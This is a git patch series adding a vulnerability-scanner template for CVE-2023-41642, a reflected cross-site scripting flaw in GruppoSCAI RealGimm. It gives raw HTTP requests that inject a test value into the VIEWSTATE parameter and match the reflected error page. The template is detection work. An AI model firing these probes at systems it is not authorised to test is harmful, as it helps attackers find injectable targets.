From 072802c4dc710ddc887652a00d279e4ea1a87f64 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 9 Oct 2023 14:46:15 +0530
Subject: [PATCH 1/3] Create CVE-2023-41642.yaml
---
http/cves/2023/CVE-2023-41642.yaml | 50 ++++++++++++++++++++++++++++++
1 file changed, 50 insertions(+)
create mode 100644 http/cves/2023/CVE-2023-41642.yaml
diff --git a/http/cves/2023/CVE-2023-41642.yaml b/http/cves/2023/CVE-2023-41642.yaml
new file mode 100644
index 00000000000..986a192ef3b
--- /dev/null
+++ b/http/cves/2023/CVE-2023-41642.yaml
@@ -0,0 +1,50 @@
+id: CVE-2023-41642
+
+info:
+ name: RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting
+ author: ritikchaddha
+ severity: medium
+ description: |
+ Multiple reflected cross-site scripting (XSS) vulnerabilities in the ErroreNonGestito.aspx component of GruppoSCAI RealGimm 1.1.37p38 allow attackers to execute arbitrary Javascript in the context of a victim user's browser via a crafted payload injected into the VIEWSTATE parameter.
+ reference:
+ - https://github.com/CapgeminiCisRedTeam/Disclosure/blob/main/CVE%20PoC/CVE-ID%20%7C%20RealGimm%20%20-%20Reflected%20Cross-site%20Scripting.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-41642
+ classification:
+ cve-id: CVE-2023-41642
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cwe-id: CWE-79
+ metadata:
+ max-request: 2
+ tags: cve,cve2023,realgimm,xss
+
+http:
+ - raw:
+ - |
+ POST /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx HTTP/2
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ User-Agent:
+
+ __EVENTTARGET=T1bPulsantiera&EVENTARGUMENT=TlbPulsantiera_Item_0%3AUP&___VIEWSTATE='TESTING&LeftArea%3ALeftMenu_hidden=&T1bPulsantiera_CancelClick=false&TlbPulsantiera_hidden=&cbUtente=&txtDataRichiestaDa=&txtDataRichiestaA=&TopArea%3ATopMenu=
+
+ - |
+ GET /RealGimmWeb/Pages/ErroreNonGestito.aspx HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent:
+
+ host-redirects: true
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_2
+ words:
+ - ''
+ - 'Invalid_Viewstate'
+ condition: and
+
+ - type: word
+ part: header_2
+ words:
+ - text/html
From 4b845fa739f30b1ca8657213585030416ffee930 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 9 Oct 2023 15:11:28 +0530
Subject: [PATCH 2/3] Update CVE-2023-41642.yaml
From 8bcc6185a4167ccb82ae395701fc21bc396b0710 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 9 Oct 2023 15:12:01 +0530
Subject: [PATCH 3/3] Update CVE-2023-41642.yaml